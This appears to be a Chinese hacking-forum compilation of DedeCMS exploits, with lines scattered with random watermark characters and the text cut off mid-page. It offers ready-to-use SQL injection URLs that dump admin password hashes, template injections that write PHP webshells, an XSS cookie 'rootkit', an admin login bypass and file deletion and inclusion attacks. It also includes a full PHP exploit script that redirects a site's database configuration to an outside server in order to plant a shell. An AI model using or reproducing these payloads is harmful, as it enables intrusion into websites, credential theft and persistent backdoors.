|
|
- `: h, G) u2 N$ J4 o. o
Dedecms 5.6 rss注入漏洞% Q6 F7 ^. D. f
http://www.test.com/plus/rss.php?tid=1&_Cs[][1]=1&_Cs[2))%20AND%20%22%27%22%20AND%20updatexml%281,%28SELECT CONCAT%280x5b,uname,0x3a,MID%28pwd,4,16%29,0x5d%29%20FROM%20dede_admin%29,1%29%23'][0]=1* W& i2 s2 n# P' S
4 U! y, h5 d4 T: |" w/ M
: U/ H0 `' T' @1 ~. R6 c
% F$ f+ X9 H7 W$ h6 m( ^0 E4 s/ u' S0 N* n; \" k
9 u! d$ w3 C# ^/ v! F/ o. Z
% I1 R: P4 c! |; V6 [6 k+ i n8 x- d( z
/ C5 v0 C9 w; t8 O D
DedeCms v5.6 嵌入恶意代码执行漏洞7 K. d* o$ A% U' _# z- i
注册会员,上传软件:本地地址中填入 a{/dede:link}{dede:toby57 name\="']=0;phpinfo();//"}x{/dede:toby57}
3 w C# `0 b0 ^4 V' |; M: x4 V发表后查看或修改即可执行
' Q l) Y2 ~' @! e2 ]a{/dede:link}{dede:toby57 name\="']=0;fputs(fopen(base64_decode(eC5waHA),w),base64_decode(PD9waHAgZXZhbCgkX1BPU1RbeGlhb10pPz5iYWlkdQ));//"}x{/dede:toby57}- }; K# a6 x+ \) [% W5 v3 y% f
生成x.php 密码xiao,直接生成一句话。# J* D' ^ U; e' [3 I7 c& G
# s8 B$ T2 B. P$ [4 B
7 ]9 g* I' @3 n9 |
, r& n# ~1 x4 x
/ W& K; o2 v- e2 G# I* k0 ~0 t- B8 c/ m+ S
8 b, @5 n7 f9 W* f! Z
c1 V* C0 x% l5 G/ e
M$ M% ~2 A( [4 K* {% G3 H$ l# C8 J
Dede 5.6 GBK SQL注入漏洞
9 h* h, p* z- r6 y6 @6 p Y9 i- y# ?http://www.test.com//member/index.php?uid=''%20||%20''''%20||%20''%E6%B6%9B%E5%A3%B0%E4%BE%9D%E6%97%A7'';- p5 |' |8 J, k8 v& q
http://www.test.com//member/index.php?uid=%E6%B6%9B%E5%A3%B0%E4%BE%9D%E6%97%A7WFXSSProbe% U* X* H6 \6 { ?( V4 X) _( [
http://www.test.com/member/index.php?uid=%E6%B6%9B%E5%A3%B0%E4%BE%9D%E6%97%A70 X6 W2 I2 m5 }( Y- F
: B/ _5 l7 i, g
V( z0 O3 v3 ?/ O7 L
4 @# i) z, }1 P3 z9 }6 J _! W, E8 b8 \* P; t7 b( b, s
; \! K2 T! F2 c
1 z+ L) ]; y- D4 p! v, e" t! v2 X" ], B; ? i. o
, |- G/ ^+ H: W- c/ k# F0 d1 iDedeCms V5.6 plus/advancedsearch.php 任意sql语句执行漏洞" a0 |: l5 y7 \& V" k- f! K
http://www.test.com/plus/advancedsearch.php?mid=1&sql=SELECT%20*%20FROM%20`%23@__admin` # G0 y7 Y2 Q! G7 g" `2 e9 H. ]) Y4 ?
/ F$ D0 e" O. y* i
! N, \7 |4 D- i- J6 V9 L6 ~4 [7 c# v. B5 z
: ]3 [; { G. T# y$ m2 B/ ~6 j9 Y4 o: c n+ r
( H" b9 k- i- J0 D0 |+ u! YDEDECMS 全版本 gotopage变量XSS漏洞% N& U b9 ~' v! N& I
1.复制粘贴下面的URL访问,触发XSS安装XSS ROOTKIT,注意IE8/9等会拦截URL类型的XSS漏洞,需关闭XSS筛选器。 8 V8 [7 v3 m! ?2 f$ t5 P) C
http://v57.demo.dedecms.com/dede/login.php?gotopage="><script>eval(String.fromCharCode(80,101,114,115,105,115,116,101,110,99,101,95,100,97,116,97,61,39,34,62,60,115,99,114,105,112,116,62,97,108,101,114,116,40,47,120,115,115,32,114,111,111,116,107,105,116,33,47,41,60,47,115,99,114,105,112,116,62,60,120,61,34,39,59,32,13,10,118,97,114,32,100,97,116,101,61,110,101,119,32,68,97,116,101,40,41,59,13,10,118,97,114,32,101,120,112,105,114,101,68,97,121,115,61,51,54,53,59,32,13,10,100,97,116,101,46,115,101,116,84,105,109,101,40,100,97,116,101,46,103,101,116,84,105,109,101,40,41,43,101,120,112,105,114,101,68,97,121,115,42,50,52,42,51,54,48,48,42,49,48,48,48,41,59,13,10,100,111,99,117,109,101,110,116,46,99,111,111,107,105,101,61,39,103,111,116,111,112,97,103,101,61,39,43,80,101,114,115,105,115,116,101,110,99,101,95,100,97,116,97,43,39,59,101,120,112,105,114,101,115,61,39,43,100,97,116,101,46,116,111,71,77,84,83,116,114,105,110,103,40,41,59,13,10,97,108,101,114,116,40,39,88,115,115,32,82,111,111,116,107,105,116,32,73,110,115,116,97,108,108,32,83,117,99,99,101,115,115,102,117,108,32,33,33,33,33,39,41,59))</script><x="4 ~4 k" ?# o, q/ m8 d5 m
4 o& O7 V) u+ R$ I5 i# v1 e0 l: Q
/ |; W2 c# S% p2.关闭浏览器,无论怎么访问下面的任意URL,都会触发我们的XSS。
0 l3 I0 ~+ M) Z, E7 c4 k5 y' @ yhttp://v57.demo.dedecms.com/dede/login.php?gotopage=dasdasdasda
+ K( y0 L" h5 M; q1 T R! y4 g4 Q/ [) T" @5 T! @
3 ~( @! Y. w% v! ^
http://v57.demo.dedecms.com/dede/login.php% U1 T4 m9 _/ w$ y% g
7 y& y+ L' F( ^) i! T* J
( c" _8 N5 x1 t. P. c) h/ ]4 [color=Red]DeDeCMS(织梦)变量覆盖getshell
% c9 V1 R8 j6 Y5 i. u7 e( a#!usr/bin/php -w
! ~8 I2 K6 h8 P, G9 _7 I' I* _<?php. t# z' n. h. H
error_reporting(E_ERROR);
- a2 l+ f* W: d8 n( [! Qset_time_limit(0);: d! c# y- ]! ?0 H7 b1 ?
print_r('
/ s' ]( W5 R2 x8 e& b& Q7 aDEDEcms Variable Coverage$ M5 [ b* N$ j0 O6 W
Exploit Author: www.heixiaozi.comwww.webvul.com
4 ]) F; Z% U9 t2 F);
/ ?3 @ x* N: u5 G( ~" wecho "\r\n";/ h. y+ |2 y$ ?% U8 u
if($argv[2]==null){2 i# [% F! f8 @4 m! o# ?( P
print_r('
E3 @$ z# S4 h+---------------------------------------------------------------------------+
) S' t; s# s! }7 m6 q* {Usage: php '.$argv[0].' url aid path
9 Y5 ?8 R3 h& b. b# eaid=1 shellpath /data/cache aid=2 shellpath= / aid=3 shellpath=/plus/* X/ f0 d$ j) F
Example:# }4 O/ V+ l: K9 p. A! Y
php '.$argv[0].' www.site.com 1 old, {3 g) X) x5 a+ i6 H
+---------------------------------------------------------------------------+
: l/ v, M/ r, D/ |( D, U5 C');6 D( J: q7 P# A4 o7 L
exit;7 |' Z$ s; f* V4 b( g0 U
}
, v- [) E/ ?& i$url=$argv[1];* F& ~2 X9 X2 J0 p
$aid=$argv[2];8 V- w! \# i4 X4 _
$path=$argv[3];
: Z7 T: |5 C5 }% {! @$exp=Getshell($url,$aid,$path);
2 d# Z; C4 p1 P0 V1 fif (strpos($exp,"OK")>12){
4 S9 p8 X8 [, S+ Aecho "' T7 `! z3 ~6 E9 e7 t( K1 t
Exploit Success \n";
. z: h( c6 @+ F) |9 r: mif($aid==1)echo "5 ?8 ?( \8 `2 m: d4 \0 P
Shell:".$url."/$path/data/cache/fuck.php\n" ;! P* s f# o- Y
, f D9 E4 d7 {* ?# j+ J; k$ e
9 ] N6 q4 n0 |' G2 q
if($aid==2)echo "
8 c4 h- s& ~0 K$ fShell:".$url."/$path/fuck.php\n" ;
2 j7 D) |/ o9 h" ~9 N& o: V0 S5 Q6 F4 e. A5 w/ W: `) C6 s
$ l: H* t9 l) j$ `+ ?: D9 F. hif($aid==3)echo "8 S; D# A+ E2 v% }! E$ @* Z
Shell:".$url."/$path/plus/fuck.php\n";
: c; M) d/ u' p9 B- T$ r; }; [( e$ ^$ g! ]
8 }4 }; F0 T1 J3 M8 @
}else{
/ `+ u* M) u0 I& N, g7 Qecho ", Q$ V) w0 h: @. a5 L
Exploit Failed \n"; Y$ S4 H% F% D; P+ Q7 f
}
0 H# O/ X5 A6 t- Q' r6 Tfunction Getshell($url,$aid,$path){2 v4 d8 j3 q% k+ S
$id=$aid;$ e8 t! `$ C. u' N+ r3 z$ \
$host=$url;6 b0 r1 D0 G0 y
$port="80";
: ]- L3 }8 M6 I1 r# p$content ="doaction=http%3A%2F%2F$host%2Fplus%2Fmytag_js.php%3Faid%3D1&_COOKIE%5BGLOBALS%5D%5Bcfg_dbhost%5D=184.105.174.114&_COOKIE%5BGLOBALS%5D%5Bcfg_dbuser%5D=exploit&_COOKIE%5BGLOBALS%5D%5Bcfg_dbpwd%5D=90sec&_COOKIE%5BGLOBALS%5D%5Bcfg_dbname%5D=exploit&_COOKIE%5BGLOBALS%5D%5Bcfg_dbprefix%5D=dede_&nocache=true&QuickSearchBtn=%CC%E1%BD%BB";8 E5 J4 @7 S% {* ]! m0 j; ^
$data = "POST /$path/plus/mytag_js.php?aid=".$id." HTTP/1.1\r\n";
0 q, @2 M m, ^: W$ C1 W$data .= "Host: ".$host."\r\n";
& u9 }) b- }! M0 k( x$ R$data .= "User-Agent: Mozilla/5.0 (Windows NT 5.2; rv:5.0.1) Gecko/20100101 Firefox/5.0.1\r\n";
7 m# S& @# M( A3 q% K$data .= "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\n";( V, ?: E* {8 L( m
$data .= "Accept-Language: zh-cn,zh;q=0.5\r\n";# l( [/ V1 A- b* P( g: N8 x
//$data .= "Accept-Encoding: gzip,deflate\r\n";
3 k. ~" z& z/ |" V$data .= "Accept-Charset: GB2312,utf-8;q=0.7,*;q=0.7\r\n";
3 | R B) P' J; Z2 i" x* f$data .= "Connection: keep-alive\r\n";
% g) ?6 |* v: ?- H) ^+ s7 N3 r9 M$data .= "Content-Type: application/x-www-form-urlencoded\r\n";: x( w. B$ A$ w
$data .= "Content-Length: ".strlen($content)."\r\n\r\n";
0 J9 j' \2 E9 q% I$data .= $content."\r\n";
0 ]7 R M2 I5 |% o$ock=fsockopen($host,$port);
9 D4 N- Q3 I5 O) ?0 X, nif (!$ock) {1 O+ [4 y# Q1 C7 \& X7 F+ d/ G
echo ". k5 E6 q1 ~2 ]/ F" D z( B& X! N
No response from ".$host."\n";
4 d% y: R; F' e. c& x}2 l: A8 [0 s7 ^1 G& q. ^, A
fwrite($ock,$data);4 T8 @# ^' g2 C. ] X0 U
while (!feof($ock)) {% p( L; r, J5 f/ B7 c
$exp=fgets($ock, 1024);
4 Y P; W3 ?7 \8 p! xreturn $exp;- W! \( a: ~* |* c1 s
}; X. E5 S4 ^+ n) w7 s5 J1 t& J: H
}: K1 L/ f) N# t6 n8 H# ~% W
& v( D9 S8 ]1 G) _
e) W. B4 @( {7 c7 |3 u?>
* L& J- |8 y; D' ], N, [2 s. x. }" K/ T
( P7 P: T" [0 E! R7 |
9 W9 x b- ?9 l3 O0 e% Y- e: O U7 g7 F' z2 P
2 U( C8 i8 j" [- u6 W
7 z7 y# D' d$ F+ H( f8 q. l, |! @0 K
$ h0 U, s5 p y
I! Z& z# B" x& Z. y
9 E2 b* o4 s0 V/ ^DedeCms v5.6-5.7 越权访问漏洞(直接进入后台)% ?# }1 b% v$ e6 u8 a
http://www.ssvdb.com/织梦网站后台/login.php?dopost=login&validate=dcug&userid=admin&pwd=inimda&_POST[GLOBALS][cfg_dbhost]=116.255.183.90&_POST[GLOBALS][cfg_dbuser]=root&_POST[GLOBALS][cfg_dbpwd]=r0t0&_POST[GLOBALS][cfg_dbname]=root$ P# y9 G4 I/ {, g
% a; ~6 L1 C! a4 _8 a& c. y' B8 h8 L; b4 f
把上面validate=dcug改为当前的验证码,即可直接进入网站后台
$ P3 s+ i; k' x0 T0 M
: Z# ^3 y2 f+ A/ G! F7 | _: O0 s+ \5 X; C( n
此漏洞的前提是必须得到后台路径才能实现: H% f; E1 v- M) x# q; |
1 y7 ]- h5 J3 |8 Z( ~9 w
) I+ i2 Y H9 F% a' I4 x& e, O! f! G# j
3 b5 {5 z+ o8 H) j) ` T8 N
0 P+ y8 x% r/ o
( l. i5 `1 R# `) D6 a$ F, R- u8 Q( F
1 c/ Q4 |5 q2 n: }; g4 J/ k W! M- r# ?+ [
8 Q, l( M0 N+ U) p4 J+ ?7 U. x1 l Q7 o: }% t5 d
Dedecms织梦 标签远程文件写入漏洞. ^8 O3 O% {0 i- Z
前题条件,必须准备好自己的dede数据库,然后插入数据: insert into dede_mytag(aid,normbody) values(1,''{dede:php}$fp = @fopen("1.php", \''a\'');@fwrite($fp, \''\'');echo "OK";@fclose($fp);{/dede:php}'');
, v9 ~7 E& u- t& @6 w
5 B$ u0 F2 f9 B& L3 o! M# `! a5 B+ Z1 {9 }9 n# i, j, m9 p9 q
再用下面表单提交,shell 就在同目录下 1.php。原理自己研究。。。 . F2 n' ^/ W3 q4 o" T* ^6 t) F
<form action="" method="post" name="QuickSearch" id="QuickSearch">
; ^' k( A' C) ]7 c2 ] x, C$ t<input type="text" value="http://www.tmdsb.com/plus/mytag_js.php?aid=1" name="doaction" style="width:400"><br />2 U v) q+ L) I, G' {
<input type="text" value="dbhost" name="_COOKIE[GLOBALS][cfg_dbhost]" style="width:400"><br />
$ A o, ?# a7 h, z<input type="text" value="dbuser" name="_COOKIE[GLOBALS][cfg_dbuser]" style="width:400"><br />
4 `/ K( O8 {. E1 d g<input type="text" value="dbpwd" name="_COOKIE[GLOBALS][cfg_dbpwd]" style="width:400"><br />
- d4 C- `% U7 S8 P8 L3 t; v* f<input type="text" value="dbname" name="_COOKIE[GLOBALS][cfg_dbname]" style="width:400"><br />
8 e; |# B( t# m- Z" r3 h( v<input type="text" value="dede_" name="_COOKIE[GLOBALS][cfg_dbprefix]" style="width:400"><br />2 j* B1 T% z4 ~5 \1 z
<input type="text" value="true" name="nocache" style="width:400">
( S/ _1 `; z D, X' g( N6 z<input type="submit" value="提交" name="QuickSearchBtn"><br />
5 H! g2 N/ O. [5 S$ T</form>
8 n. f6 i( V$ O% I<script>; i# k6 b3 E* v
function addaction(). L u7 K( C& S8 n: X: X0 A) \
{
4 L* g8 {$ T( I3 h% Qdocument.QuickSearch.action=document.QuickSearch.doaction.value;, d% a' l4 C4 B! b
}
% o5 S1 J8 `; f1 m</script> y1 D( N' N% R
! H ^( D" p' `2 l K+ u/ h0 P4 a5 N
( k# N7 f- h5 U3 |8 u# P5 W
8 l' ~5 v# p1 @0 l
_ G2 ^! \( ` e* P" K) B- p" J
( M9 ]7 u4 R5 H1 Y) `' t
9 J6 Y% k5 y" w& h
7 |7 r- c7 L+ |; T0 {
2 h6 i# A9 r* S; p: R, J: _
- }' \3 n, J7 ]! w8 L! uDedeCms v5.6 嵌入恶意代码执行漏洞' {8 ~! c: V9 Z! H$ e5 [: O
注册会员,上传软件:本地地址中填入a{/dede:link}{dede:toby57 name\="']=0;phpinfo();//"}x{/dede:toby57},发表后查看或修改即可执行! g" \ r- N$ D6 K( r7 ~
a{/dede:link}{dede:toby57 name\="']=0;fputs(fopen(base64_decode(eC5waHA),w),base64_decode(PD9waHAgZXZhbCgkX1BPU1RbeGlhb10pPz5iYWlkdQ));//"}x{/dede:toby57}
' ]2 D' h, c3 P6 m8 P5 L- ?9 |生成x.php 密码:xiao直接生成一句话。密码xiao 大家懂得, k& I9 B/ C$ S4 ~+ L- |
Dedecms <= V5.6 Final模板执行漏洞
! D8 s+ A- H3 c注册一个用户,进入用户管理后台,发表一篇文章,上传一个图片,然后在附件管理里,把图片替换为我们精心构造的模板,比如图片名称是:, B4 |& I) i0 }7 H2 |
uploads/userup/2/12OMX04-15A.jpg
" Z- ]) q& ^/ X3 E+ h
1 d+ l/ d7 ^3 J4 q' {& j
4 p) J0 f7 Z' y& k2 }模板内容是(如果限制图片格式,加gif89a):
' ~2 D6 w/ F" R& B; r{dede:name runphp='yes'}
1 Y2 m9 P2 U2 F4 |3 t3 j1 g$fp = @fopen("1.php", 'a');$ @% m# \. }( c7 I" n: T- I+ {
@fwrite($fp, '<'.'?php'."\r\n\r\n".'eval($_POST[cmd])'."\r\n\r\n?".">\r\n");4 F7 @9 v* n- h( n* m# t2 d
@fclose($fp);* ?) B5 x; F& l/ p
{/dede:name}0 i" I& P& l9 p+ Y
2 修改刚刚发表的文章,查看源文件,构造一个表单:
$ @8 G% K4 O2 Y$ z5 S! ]0 b M<form class="mTB10 mL10 mR10" name="addcontent" id="addcontent" action="http://127.0.0.1/dede/member/article_edit.php" method="post" enctype="multipart/form-data">
8 \* a; q1 [- I$ X. i X<input type="hidden" name="dopost" value="save" />
/ ~2 e8 N: X6 }7 R. U8 }5 |<input type="hidden" name="aid" value="2" />9 C: o' h1 m- c% S( r: h
<input type="hidden" name="idhash" value="f5f682c8d76f74e810f268fbc97ddf86" />
' f) @5 w. z' Z/ J' X* |<input type="hidden" name="channelid" value="1" />9 s4 ~# W* o/ s! Q
<input type="hidden" name="oldlitpic" value="" />
& u2 \7 @( k+ M3 ^- l<input type="hidden" name="sortrank" value="1275972263" />
z' p$ j1 L2 d; x6 b2 M
" D7 G1 a) g7 G3 W+ t2 e
/ E6 D& r$ O5 E8 P6 F! z<div id="mainCp">$ n- \9 J2 f- p7 M
<h3 class="meTitle"><strong>修改文章</strong></h3>
5 Z9 ]1 {) F( b
0 c S a" a; G4 G' l. s, H* ~/ ]' S. S. c# ]/ `' U/ Y3 O
<div class="postForm">
1 C1 H# U/ @; e& W$ d) U, C<label>标题:</label>* L% W" a+ O+ }& S
<input name="title" type="text" id="title" value="11233ewsad" maxlength="100" class="intxt"/>
) r7 v' @4 d' g- v" f
7 X" I4 a! L; A) \8 [( O
# j U! O$ a) g) Z2 W<label>标签TAG:</label>' j& w+ \2 V' H% h+ `
<input name="tags" type="text" id="tags" value="hahah,test" maxlength="100" class="intxt"/>(用逗号分开)" H/ {# O0 s% f6 l$ s
8 [* e: ?0 X% y+ d/ k
2 X6 C0 K& {2 x9 g! L( \4 _<label>作者:</label>- P! D8 h! M; T0 Y) w- Q
<input type="text" name="writer" id="writer" value="test" maxlength="100" class="intxt" style="width:219px"/>
4 F, i/ Q- }9 D
1 c6 d) y; H; F5 C3 n& c4 k9 R8 L& Z
<label>隶属栏目:</label>
6 i' B$ q; k: d. O- d<select name='typeid' size='1'>9 ^0 O+ Z4 |5 f, j) }' g6 M2 j
<option value='1' class='option3' selected=''>测试栏目</option>1 \6 r+ v2 e9 c. t8 |+ E9 R# x
</select> <span style="color:#F00">*</span>(不能选择带颜色的分类)! N) p% S, b1 U' d* L( |1 i: v
6 J& P9 H) X1 i, Q5 f6 J" B: \) }$ e2 g3 F. L% d$ s, L& b. B
<label>我的分类:</label>
8 y0 W" K9 Q% ~<select name='mtypesid' size='1'>- S* _. r$ A4 G: b7 B
<option value='0' selected>请选择分类...</option>; C$ I8 X2 p z/ Z/ U$ f$ f
<option value='1' class='option3' selected>hahahha</option>
& D3 S5 t% ?) |6 l! D6 I, j</select>
$ H+ N3 `9 j* p
; n' t" l1 h. f) B) o: b
7 j7 |' V% ?4 K. A8 z" |) {& D7 z<label>信息摘要:</label>' W- w; X$ ~4 a( [/ S8 G
<textarea name="description" id="description">1111111</textarea>
( Q; ~" w/ E* A! }(内容的简要说明)8 D6 `" m/ E* K: s% Z. p) l" ~
7 t/ k! R5 W2 ^# r0 z
. C7 u; K: L/ C; N9 N<label>缩略图:</label>/ @: M; p$ ]* ]3 @1 Q
<input name="litpic" type="file" id="litpic" maxlength="100" class="intxt"/>
. D' K: x7 l2 f) R A x: i# l' {1 e; {/ b
: z7 R- m& g! Z) b0 v7 A5 b/ {1 p
<input type='text' name='templet'+ M( @: o! Z5 e' v
value="../ uploads/userup/2/12OMX04-15A.jpg">
% T+ z! {. O6 P9 ]$ B6 J<input type='text' name='dede_addonfields'
k5 ?# P# P8 |9 Dvalue="templet,htmltext;">(这里构造), A+ V w2 Z* _; g$ B' m* e2 G" c- E
</div>* n# _4 a# O, @7 Y
0 B# h' w9 f/ p/ | c
) f; }& E: Z; f" O9 j: w( T& h" i7 X# N<!-- 表单操作区域 -->
8 u! ?+ o- k! o<h3 class="meTitle">详细内容</h3>8 g6 ~" n3 b. f6 J: K8 L
) j5 t, n+ J, ?" [% v# ]
/ N3 V6 T: T6 n. l5 c<div class="contentShow postForm">
7 v- \4 T0 C7 y$ b" L<input type="hidden" id="body" name="body" value="<div><a href="http://127.0.0.1/dede/uploads/userup/2/12OMX04-15A.jpg" target="_blank"><img border="0" alt="" src="http://127.0.0.1/dede/uploads/userup/2/12OMX04-15A.jpg" width="1010" height="456" /></a></div> <p><?phpinfo()?>1111111</p>" style="display:none" /><input type="hidden" id="body___Config" value="FullPage=false" style="display:none" /><iframe id="body___Frame" src="/dede/include/FCKeditor/editor/fckeditor.html?InstanceName=body&Toolbar=Member" width="100%" height="350" frameborder="0" scrolling="no"></iframe>
2 k- p' ~1 e2 t! i( D$ b1 P' B* F( x
7 c. F/ a/ }* i; D9 ~, g' s `/ y<label>验证码:</label>/ ?2 q* p2 @) o' ^+ |2 L
<input name="vdcode" type="text" id="vdcode" maxlength="100" class="intxt" style='width:50px;text-transform:uppercase;' />
! U+ o3 H3 [7 d$ d1 b: r<img src="http://127.0.0.1 /dede/include/vdimgck.php" alt="看不清?点击更换" align="absmiddle" style="cursor:pointer" />% | ?- u. b! T
' O1 b% ^) z% }1 R$ s6 c& Z
) I: Q; G. l! z( g<button class="button2" type="submit">提交</button>
$ @7 \* R4 l2 _8 o+ X* ^- Y. J1 N& R<button class="button2 ml10" type="reset">重置</button>
: k. i! c" D0 d# n</div>
4 {9 R O, v9 |2 M1 Q- \: K/ n h! I- a5 |* p' q8 r p) J H
" V1 [4 ~, c; x8 U, O1 g- A
</div>
5 Q; Y% U# D7 P2 R1 H: j7 J$ Q' z/ w. f
8 ]$ W+ ]+ ^+ `1 U9 `, o( w
</form>, r" g; @# Q0 b
( I- w1 ?; i( n" m. Z/ ~- [9 P( s
' A) ^8 i V8 S3 u& S提交,提示修改成功,则我们已经成功修改模板路径。 3 访问修改的文章:
% d4 L' n/ d$ Z假设刚刚修改的文章的aid为2,则我们只需要访问:/ ~0 P, G# U7 z) p& ^' O
http://127.0.0.1/dede/plus/view.php?aid=2/ h' k5 I/ C2 q, D7 v, w
即可以在plus目录下生成webshell:1.php
7 F' C! X' e; e7 U3 @) c2 |5 S1 `
5 D: F" Z q2 e7 p# r
/ R9 u [; g: [6 A' Y8 g6 o& X) Q4 W6 R, V4 S4 n6 R
2 v Y! l% s) g9 b& D* U" X
P5 v; C- }$ N7 |. R2 s, t
8 z# x, W0 d f0 [
- e& z& Z5 U) A& r! Q6 J& y V& O
6 }2 p# H) O+ O! e7 I9 `3 Y1 m/ }# S. k
: B5 F7 a: U; i
" {* C6 X3 o8 ?8 p9 P- S
4 X" ?# n# O2 G( f5 L/ rDEDECMS网站管理系统Get Shell漏洞(5.3/5.6)4 h2 A7 k: j- C
Gif89a{dede:field name='toby57' runphp='yes'}
6 Z, ~& f1 @9 I8 Z! ^: D; sphpinfo();
# O$ [' i- j, |{/dede:field}1 M6 U5 s2 C5 p& H1 Q3 _3 ?: E h
保存为1.gif) j4 u- j/ T6 m* o
<form action="http://192.168.1.5/DedeCmsV5.6-GBK-Final/uploads/member/uploads_edit.php" method="post" enctype="multipart/form-data" ">
9 S1 ~- o$ l0 ?/ u7 C+ ? c9 x3 U<input type="hidden" name="aid" value="7" /> 1 K. ]0 y' m( D- K f8 m
<input type="hidden" name="mediatype" value="1" /> % J( t! f( r3 {; H& p( L
<input type="text" name="oldurl" value="/DedeCmsV5.6-GBK-Final/uploads/uploads/userup/3/1.gif" /></br>
" q& E4 O- \1 u O& I% Z) \<input type="hidden" name="dopost" value="save" />
! _" @6 y) ~9 S3 \- S2 D/ \<input name="title" type="hidden" id="title" value="1.jpg" class="intxt"/>
1 m; q: m- Z: H6 {6 O- y+ f5 c8 ]<input name="addonfile" type="file" id="addonfile"/>
2 R. X! U; u) k6 x' A<button class="button2" type="submit" >更改</button> 5 G3 V5 }# |! d
</form>
x& @0 c7 g* o: M1 F( r, u; J5 S" ^2 x7 M+ l. Z
/ u! ]5 `9 s% o( V# U$ `
构造如上表单,上传后图片保存为/uploads/userup/3/1.gif& |; x+ ~* T0 w4 t
发表文章,然后构造修改表单如下:
8 G' G1 w$ ]2 q0 B% W1 w! @. {" q& \) E
2 @9 i) ]4 g, j6 G( Q
<form action="http://192.168.1.5/DedeCmsV5.6-GBK-Final/uploads/member/article_edit.php" method="post" enctype="multipart/form-data"> ! b, E. \# S0 v0 p1 |7 z
<input type="hidden" name="dopost" value="save" /> , T& u; e7 H1 g
<input type="hidden" name="aid" value="2" />
$ c" p% f+ V, b" M! n<input type="hidden" name="idhash" value="ec66030e619328a6c5115b55483e8dbd" />
) u, C+ b3 n( Q# m$ o8 @ U7 D2 Q<input type="hidden" name="channelid" value="1" /> - f. T0 ?0 h! r5 t' O
<input type="hidden" name="oldlitpic" value="" /> 8 T$ m; i8 C$ t- r x I
<input type="hidden" name="sortrank" value="1282049150" /> 3 Q1 j* `" j5 Y% G0 o0 t3 Q- @
<input name="title" type="text" id="title" value="aaaaaaaaaaaaaaa" maxlength="100" class="intxt"/>
$ P* s. D1 i; K. A$ Q; J<input type="text" name="writer" id="writer" value="123456" maxlength="100" class="intxt" style="width:219px"/> 6 B7 h3 N! ]) Y* J
<select name='typeid' size='1'>
9 E# V! N' v7 ?0 c- e6 x4 B<option value='1' class='option3' selected=''>Test</option> & T0 ~6 V3 o. {/ V- s
<select name='mtypesid' size='1'>
2 f8 q; s! j% e- ]<option value='0' selected>请选择分类...</option>
( f' \/ u3 U1 e. R7 ?<option value='1' class='option3' selected>aa</option></select> 2 U( |( c) D( j( J i. r
<textarea name="description" id="description">aaaaaaaaaaaaa</textarea> ( X0 A2 j- m2 Q
<input type='hidden' name='dede_addonfields' value="templet">
/ M# y' m; q0 B. p+ [<input type='hidden' name='templet' value="../uploads/userup/3/1.gif">
2 [) `' ^! q9 _6 ?/ S( [<input type="hidden" id="body" name="body" value="aaaa" style="display:none" /> 3 g6 d, Y9 f, t! c% _, C
<button class="button2" type="submit">提交</button>
$ Q/ S P; V( R</form>
7 X: c5 U$ u7 X9 j Y
6 P4 r0 n8 t6 X5 y3 M' M$ A8 p
4 @6 s: T( k! R6 D6 P
6 n& |3 M! h( g) `* r
8 M9 L) @# D/ t- b! w- V, U# E3 }0 R0 x p
# x5 h1 n2 L5 C ?4 N7 ?
5 b& Y% k, ~/ `$ i5 U! d
. y7 W5 H% |! y* I; x! `
5 [* D, j* b* i! P ^9 V' h& b5 q. J t1 [
: P+ ?( X2 h- {% a0 \织梦(Dedecms)V5.6 远程文件删除漏洞
' O" M- ?0 n( a8 t5 Khttp://test.com/member/edit_face.php?dopost=delold&oldface=/uploads/userup/8/../../../member/templets/images/m_logo.gif0 {/ I' m6 {4 _8 p3 }2 a
! u* Q v+ ?2 J
- a8 n" y+ J. c6 }! G, t/ b" U& l; H+ l; V# A+ I
% t/ a d! \2 G( J
9 o3 H1 s" N7 g: ~% g4 ~- _# z
( b! [+ I& i3 w- a; N0 _) o
7 A# b S) S# ^, n9 W7 C0 l& f
$ V }0 d# a" K6 t4 e3 i
. g' H! o+ n3 h. |+ ~$ N
) Y2 e$ _6 ~5 P4 _, |织梦(Dedecms) V5.6 plus/carbuyaction.php 本地文件包含漏洞
) M5 t4 l2 f9 l D, W" y( P$ ~http://www.test.com/plus/carbuya ... urn&code=../../
. a0 }0 m2 G8 i: W2 S, r T0 ^# _' G! v" w: l- F7 E+ G; n" l* s
* h( u0 O5 s B2 n Q( c$ n! @
$ j- i8 N) D7 j# o( ^/ ?
/ b; z+ l& n& l6 e
8 N1 U' F( A y( |- V# c j& R, W
* [ p2 n1 ^) q0 _9 H
' }7 c! R: D; H3 R/ I. E( l$ w. R0 `" U
DedeCms V5.6 plus/advancedsearch.php 任意sql语句执行漏洞
1 g, a; Z' }( Y+ ~# ^plus/advancedsearch.php?mid=1&sql=SELECT%20*%20FROM%20`%23@__admin`
$ N* m) t# b% }, [密码是32位MD5减去头5位,减去尾七位,得到20 MD5密码,方法是,前减3后减1,得到16位MD58 [* Q/ ]" X$ R- ]. F
9 ^5 ^5 A5 F+ v- G* x5 o
# f* T# z0 y+ N
. ^6 ]( [) b! W* k
8 U8 a8 K3 d& `, _8 }3 y8 a* Q: ]2 Q6 @. p0 U" \; H' j* I9 a n* Q
L! X6 Y, m8 m8 @& v
* O6 P: X6 `8 n2 A3 g$ m" ^! c4 m8 D' e
0 ~/ C# V# _- {! S8 ? x( v: C( h
9 V! v' W" u& f3 f$ I& S织梦(Dedecms) 5.1 feedback_js.php 注入漏洞
! @" b# s. ? C4 X5 |# zhttp://st0p/dedecms51/plus/feedback_js.php?arcurl=' union select "' and 1=2 union select 1,1,1,userid,3,1,3,3,pwd,1,1,3,1,1,1,1,1 from dede_admin where 1=1 union select * from dede_feedback where 1=2 and ''='" from dede_admin where ''='4 P! D5 C7 i% u+ f! q# Y
* `! {2 Z/ M: N& z! E
$ ^- ?0 p$ Z1 j8 m+ T$ D! z
* a, v# g7 S+ d2 [ A V; c
1 j0 Q( n/ S2 F" s
% _ b$ Y* ^1 b4 j, h* l9 D6 Y- K U/ n$ U
2 p7 ^; Z9 P" }$ _" K. W5 ?: ~; h9 e0 F
& n+ F3 e; t7 N8 [% ~! i
7 {- d$ A- L& c B4 v% u
织梦(Dedecms)select_soft_post.php页面变量未初始漏洞
6 \) `) @! P6 o/ i/ L<html>% F6 S1 Z) i* ~' q$ v7 _
<head>; [0 Z' m! p0 }( H
<title>Dedecms v55 RCE Exploit Codz By flyh4t</title>* S4 ?* g" ^* J* g( Z: s
</head>% [4 o/ r& f: d3 M: W
<body style="FONT-SIZE: 9pt">
